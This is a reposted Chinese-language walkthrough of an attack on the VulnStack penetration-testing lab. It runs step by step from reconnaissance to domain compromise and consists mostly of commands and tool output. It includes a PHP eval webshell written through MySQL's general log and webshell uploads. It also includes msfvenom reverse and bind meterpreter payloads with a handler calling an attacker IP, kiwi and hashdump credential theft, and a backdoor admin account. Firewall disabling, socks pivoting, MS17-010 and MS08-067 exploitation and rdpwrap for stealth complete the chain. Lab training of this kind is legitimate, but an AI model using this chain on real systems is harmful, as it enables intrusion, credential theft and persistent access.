VulnStack超全面詳細的滲透測試筆記

本文轉載自查看原文 2022-01-24 16:37 729 經典滲透實戰

1. 根據網卡獲取的網段信息，對win7所在網段來一波存活主機檢測，排除其他的之后目標鎖定在主機號為128的主機上

2. 對發現的存活主機來一波整體信息收集發現開了以下的端口，並且是一個域用戶

┌──(root💀kali)-[/]

└─# nmap -A 192.168.164.128

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CST

Nmap scan report for 192.168.164.128

Host is up (0.00052s latency).

Not shown: 989 closed ports

PORT     STATE SERVICE      VERSION

80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)

|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45

|_http-title: Site doesn't have a title (text/html).

135/tcp  open  msrpc        Microsoft Windows RPC

139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn

445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)

1025/tcp open  msrpc        Microsoft Windows RPC

1026/tcp open  msrpc        Microsoft Windows RPC

1027/tcp open  msrpc        Microsoft Windows RPC

1028/tcp open  msrpc        Microsoft Windows RPC

1029/tcp open  msrpc        Microsoft Windows RPC

1030/tcp open  msrpc        Microsoft Windows RPC

3306/tcp open  mysql        MySQL (unauthorized)

MAC Address: 00:0C:29:A7:C1:B2 (VMware)

Device type: general purpose|media device

Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded

OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1

OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1

Network Distance: 1 hop

Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s

|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:a7:c1:b2 (VMware)

| smb-os-discovery:

|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)

|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional

|   Computer name: stu1

|   NetBIOS computer name: STU1\x00

|   Domain name: god.org

|   Forest name: god.org

|   FQDN: stu1.god.org

|_  System time: 2021-07-26T09:55:13+08:00

| smb-security-mode:

|   account_used: guest

|   authentication_level: user

|   challenge_response: supported

|_  message_signing: disabled (dangerous, but default)

| smb2-security-mode:

|   2.02:

|_    Message signing enabled but not required

| smb2-time:

|   date: 2021-07-26T01:55:13

|_  start_date: 2021-07-26T01:43:45

TRACEROUTE

HOP RTT     ADDRESS

1   0.51 ms 192.168.164.128

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 85.47 seconds

3. 訪問改web服務器的地址獲取頁面內容,發現並沒有什么可以利用的東西,只能先目錄掃描獲取一些有用有用信息

4. 用dirsearch工具來掃描，kali默認沒有安裝，自己裝一下就好了，發現有phpmyadmin的目錄，說明安裝了phpmyadmin，正好和端口掃描的3306 mysql服務相對應，然后在把目錄都訪問一遍之后發現了phpstudy探針

└─dirsearch -u http://192.168.164.128

5. 本來想着找個python腳本爆破一下，可惜網上的大多用不了，手動猜出來了root：root，登陸進去之后就是通過phpmyadmin寫入webshell了

我們這里用日志寫入一句話的方式，首先進入phpmyadmin后台，查看genelog變量，更改general log和general log file參數，初始設置general log是OFF，我們將其改成ON；general log file改成網站的根目錄，通過phpstudy指針已經知道了網站根目錄

show global variables like '%general%';

set global general_log='on';

set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';

這邊寫入大馬意識可以的：

select '<?php eval($_POST["shell"]);?>';

6. 蟻劍連接不用多說了，這邊有個坑，蟻劍下載插件的時候用了代理，本地環境連接一直連不上，人麻了，測試了一下權限administrator真的高

7. 查看根目錄之后發現了一個cms，我們在瀏覽器訪問，自己安裝的phpstudy打不開這個管理系統，把原來的phpstudy重啟一下完美解決

不用掃目錄之類的了，主頁面已經給了出來信息直接用，進入后台並登錄

8. 在前台模板哪里發現了上傳點，我們可以上傳一個大馬，奧里給！創建了一個名為shell_1.php的文件，然后就是查找創建的目錄

9. 找了半天，在robots.txt里面找到了目錄一個一個找出來了，不過好像可以目錄穿越出來，我試了幾下沒粗來，不過這個大馬子挺好用

10. 看了一下教程，說是留言板有個xss的，我們也來試試

<script>alert('xss')</script>

成功彈窗

11. 不整那么多了，現在就是經典內網環節，先用msf生成馬子用蟻劍上傳,反彈shell用msf監聽

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe

把生成的馬子傳上去之后執行，msf監聽拿到會話

use exploit/mutli/handler

set payload windows/x64/meterpreter_reverse_tcp

set lhost 192.168.164.129

set lport 1222

12. 本來獲得會話之后就要是要提權，這個進來之后就是admin，所以省略這一步，我們直接抓取域用戶的密碼信息

13. 加載Kiwl插件獲取hash並解密

ps：

migrate PID(進程遷移)這邊meterpreter是32位的,系統是64位的,所以得遷移進程

meterpreter > load Kiwi

meterpreter > creds_all

14. 開啟3389端口，進入遠程桌面，用nmap看看開了沒，這邊還需要自己添加用戶

net user test Admin123 /add # 添加賬戶密碼

net localgroup administrators test /add # 給test賬戶添加為管理員權限

net user test # 查詢是否成功添加test用戶

run post/windows/manage/enable_rdp

rdesktop 192.168.164.128:3389 kali的一個遠程工具

15. 開始橫向移動，先自動創建路由

run post/multi/manage/autoroute

16. 掛起會話，通過post/multi/manage/autoroute 這個模塊查看路由表

17. 使用auxiliary/server/socks_proxy這個模塊開進行socks代理，設置好服務器ip和端口，運行后自動掛入后台

18. 修改/etc/proxychains.conf文件

19. 查看socks5的端口開啟了沒

20. 起來了之后就可以使用nmap掃描到內網的存活主機，這樣掃描起來有點慢

proxychains nmap -sT -Pn 192.168.52.143

21. 我們這里使用msf自帶的模塊來掃描，發現了兩台存活的主機

use auxiliary/scanner/netbios/nbname

22. 再用msf的端口掃描模塊對發現的主機掃描，查看開放的端口，這邊雙管齊下，掃描的太慢了

use auxiliary/scanner/portscan/tcp

23. 都開了445端口經典ms17_010利用起來，先掃描發現有ms17_010的洞

use auxiliary/scanner/smb/smb_ms17_010

24. 既然都有洞了，我門直接絲滑小連招，使用ms17_010的command模塊可以執行指令

use auxiliary/admin/smb/ms17_010_command

25. 這個上車補票衛視不晚，我們搜集一波域信息

net config workstation 查看是否有域，以及當前登錄域

這邊有一個亂碼問題，我們在shell視圖輸入，完美解決

C:\Windows\system32>chcp 65001

net view 查看域內主機列表

net group "domain controllers" /domain 查看域控制器(如果有多台)

然后通過 ping 命令查看域中主機的ip

net user /domain 查看域內所有域用戶

net group "domain admins" /domain 查看域管理員列表

26. 完全可以用ms17_010command模塊來執行命令，打開3389添加用戶，登陸進去，其實在win7上就拿到了管理員用戶名和密碼，不過這是練習，我們就在繼續騷操作

我們通過彈一個正向shell (因為msf 開了代理，所以不能彈反向shell),我們可以win7遠程桌面,所給把馬子傳給win7然后開共享目錄,下載到域控上面,然后執行

msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe

msfconsole開啟監聽

use exploit/multi/handler

win7開啟共享

然后用域控的ms17_010command執行復制指令

copy \\192.168.52.143\WWW\s.exe C:\s.exe

這里又有一個坑，win7防火牆開了，導致域控一直下載不了文件，麻了

查看放防火牆狀態：

netsh advfirewall show allprofile state

關閉所有防火牆：

netsh advfirewall set allprofiles state off

再試試下載文件，不能下載，我們用其他方法

set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe

這里我是下完之后試的，重啟機子就好了，我tm

然后就是msf監聽了

set payload windows/x64/meterpreter/bind_tcp

一直連不上shell應該是防火牆的原因，不過我在用win7的nmap掃描之后發現了ms08_067

27. 利用exploit/windows/smb/ms08_067_netapi這個模塊直接拿shell

set payload windows/meterpreter/bind_tcp

28. 利用一下win7上的nmap了掃描一下另外兩個主機，兩個主機都有ms17_010的洞，不過有一台是32位的系統利用不了，只能從另一台下手了

exploit/windows/smb/ms17_010_eternalblue

這還有坑這個主機開了防火牆，我之前試了幾次一直拿不到shell，用ms17_010command執行指令關閉之后就返回了shell，這個因為開了代理所以得用set payload windows/x64/meterpreter/bind_tcp正向連接

29. 現在就是抓取hash密碼，開啟遠程桌面，作為桌面黨開了遠程桌面才算舒服了~~~

套娃ing，這里可以用端口轉發，我直接在win7的遠程再開一個遠程

30. 最后一個其實已經拿到域管理員的密碼了可以直接用ms17_010commad關閉防火牆打開3389了

這里還有一點對於非服務器版本的windows 遠程登錄的話，會斷開該主機當前的連接，有可能會驚動管理員。這個時候不慌，可以使用rdpwrap。

rdpwrap是一款可以允許非服務器版本進行多個用戶登錄的patcher，從github上面下載下來，用蟻劍把 RDPWInst.exe 傳上去，然后執行：

RDPWInst.exe -i -s

`總結：`

1.通過NMAP對目標網絡段進行存活主機探測，通過排查發現目標主機128有可利用點

nmap -sp 192.168.164.0/24

2.對128主機進行端口探測，發現是該主機是域成員主機以及開放了80,445,3306端口

nmap -A 192.168.164.128

3.通過dirsearch對192.168.164.128的web應用進行URL目錄掃描，發現存在phpmyadmin目錄和l.php

4.訪問1.php，發現網站的根目錄為：C:/phpStudy/PHPTutorial/WWW/

5.訪問phpmyadmin目錄，是網站的數據庫管理系統，這里通過嘗試輸入弱口令root/root即可登錄系統

6.在sql語句中執行命令查看general變量，發現general log是OFF，並且發現general log file的根目錄是C:/phpStudy/PHPTutorial/MYsql/

show global variables like '%general%';

7.將general log設置為on

set global general_log='on';

8.將 general log file設置為網站根目錄

set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';

9.通過log日志寫入一句話

select '<?php eval($_POST["shell"]);?>';

10.通過蟻劍成功連接一句，並通過自帶的命令功能查看下當前目標權限為admin權限

whomai

12.發現目標系統中的根目錄下還有一個CMS目錄，訪問CMS目錄，公告直接泄露了網站后台的用戶名和密碼，可成功登陸到系統后台

13.在后台模板處可直接上傳php大馬，大馬名稱為shell_1.php

14.通過robots.txt查看到泄露的目錄，訪問目錄，可目錄遍歷到上傳到大馬的目錄保存路徑

http://192.168.164.128/yycms/protected/apps/default/view/default

15.可成功訪問php大馬

http://192.168.164.128/yycms/protected/apps/default/view/default/shell_1.php

16.在攻擊機上執行MSF生成的后門

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe

17.通過蟻劍將asd.exe上傳到目標系統中，並通過其命令功能執行

c:/>acd.exe

18.MSF進行監聽，成功上線

use exploit/mutli/handler

set payload windows/x64/meterpreter_reverse_tcp

set lhost 192.168.164.129

set lport 1222

19.通過smart_hasdump模塊獲取目標的hash值，可成功獲取到管理員的hash

meterpreter>run post /windows/gather/smart_hashdump

20.加載kiwi插件獲取hash並解密

meterpreter > load Kiwi

meterpreter > creds_all

21.通過注冊表開啟3389端口，添加遠程桌面用戶，進入遠程桌面

meterprter>shell

c:/>ipconfig   //查看到目標系統存在兩個網卡，一個網卡IP地址為192.168.164.128,另外一個網卡IP地址為192.168.52.143

c:/>net user test Admin123 /add # 添加賬戶密碼

c:/>net localgroup administrators test /add # 給test賬戶添加為管理員權限

c:/>net user test # 查詢是否成功添加test用戶

rdesktop 192.168.164.128:3389 //kali下進行遠程桌面

22.開始橫向移動，先自動創建路由

meterprter>run post/multi/manage/autoroute

23.掛起會話，通過post/multi/manage/autoroute查看路由表

meterprter>background

msf>use post/multi/manage/autoroute

msf>set session 1

msf>route print

msf>run

24.使用auxiliary/server/socks_proxy這個模塊開進行socks代理，設置好服務器ip和端口，運行后自動掛入后台

msf>use auxiliary/server/socks_proxy

msf>set srvhost 127.0.0.1

msf>run

25.修改/etc/proxychains.conf文件

sokcs5 127.0.0.1 1080

26.查看socks5端口

netstat -an |grep 1080

27. 這里使用msf自帶的模塊來掃描，發現了兩台存活的主機（192.168.52.138與192.168.52.141）

use auxiliary/scanner/netbios/nbname

28.通過proxychains加載nmap進行掃描另一個網卡IP 192.168.52.141端口，發現也開放了80,335,3306，445端口

proxychains nmap -sT -Pn 192.168.52.141

29.再用msf的端口掃描模塊對發現的主機掃描，查看開放的端口，發現192.168.52.138端口開放了21,445等端口

use auxiliary/scanner/portscan/tcp

30.都開了445端口經典ms17_010利用起來，先掃描發現有ms17_010的漏洞

use auxiliary/scanner/smb/smb_ms17_010

31. 使用ms17_010的command模塊可以執行指令

use auxiliary/admin/smb/ms17_010_command

32.查看目標系統信息

msf>sessions -i 2

meterprter>shell

c:/>net config workstation //查看是否有域，查看當前域情況

c：>chcp 65001 //解決中文亂碼

c:/>net view //查看當前域主機列表

c:/>net group "domain controllers" /domain //查看域控制器

c:/>ping owa 查看計算機名對應的IP地址

c:/>net user /domain 查看域內用戶

c:/>net group "domain admins" /domain 查看域管理員列表

33.通過彈一個正向shell (因為msf 開了代理，所以不能彈反向shell),我們可以win7（192.168.52.143）遠程桌面,所給把馬子傳給win7然后開共享目錄,下載到域控上面,然后執行

msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe

34.MSF進行監聽

use exploit/multi/handler

set payload windows/meterprter/bind_tcp

set lhost 192.168.164.129

set lport 3333

run

35.遠程桌面上win7（192.168.52.143）開啟共享

36.在域控主機上下載s.exe

copy \\192.168.52.143\WWW\s.exe C:\s.exe //發現下載不了，估計是win7防火牆開了

37.查看放防火牆狀態：

netsh advfirewall show allprofile state

38.關閉所有防火牆：

netsh advfirewall set allprofiles state off

39.再試試下載文件，不能下載，我們用其他方法

set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe

下載地址： 
              
              http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

 
             
             
 
             
             
             原文連接： https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247490306&idx=1&sn=1de54ed0a21ae330bf0370969c9d77ae&chksm=cfa6bf11f8d136070e1e4d5fe4bade74b82683e844cb9c3013fcdb4aaba546a70cc019ba1209&scene=178&cur_album_id=1553386251775492098#rd

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 我的滲透測試筆記(一) kalilinux 滲透測試筆記滲透測試筆記——入門篇 AD域滲透測試筆記 ZooKeeper測試筆記 CTS測試筆記 sdk測試筆記小白學滲透，超詳細教程筆記~《繞過密碼登錄》原視頻是我們老師課上給看的B站up主“知黑科技”的系列教程：2019超詳細滲透測試/黑客入門/漏洞學習 fastjsion反序列化漏洞滲透測試筆記安全面試（安服，滲透測試）